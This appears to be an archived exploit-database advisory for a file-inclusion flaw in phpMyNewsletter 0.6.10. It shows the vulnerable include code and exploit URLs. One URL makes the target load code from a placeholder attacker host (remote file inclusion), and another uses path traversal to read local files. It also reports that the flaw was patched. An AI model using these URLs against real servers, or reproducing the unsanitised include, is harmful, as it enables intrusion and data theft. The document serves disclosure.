37 lines
No EOL
948 B
HTML
37 lines
No EOL
948 B
HTML
Product : phpMyNewsletter
|
|
Tested version : 0.6.10
|
|
Website : http://gregory.kokanosky.free.fr/phpmynewsletter/
|
|
Problem : include file
|
|
|
|
PHP code :
|
|
°°°°°°°°°°
|
|
---- /include/customize.php ----
|
|
<?
|
|
$langfile = $l;
|
|
|
|
include $l;
|
|
?>
|
|
---- /include/customize.php ----
|
|
|
|
Exploit :
|
|
°°°°°°°°°
|
|
http://[target]/include/customize.php?l=http://[attacker]/code.txt&text=Hello%20World
|
|
With in http://[attacker]/code.txt :
|
|
<? echo $text; ?>
|
|
|
|
or
|
|
http://[target]/include/customize.php?l=../path/file/to/view
|
|
|
|
Patch :
|
|
°°°°°°°
|
|
Autor has been alerted and last version (0.7beta1) has been patched.
|
|
|
|
More details
|
|
- in french :
|
|
http://www.frog-man.org/tutos/phpMyNewsletter.txt
|
|
- translated by Google :
|
|
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FphpMyNewsletter.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools
|
|
|
|
frog-m@n
|
|
|
|
# milw0rm.com [2007-04-04] |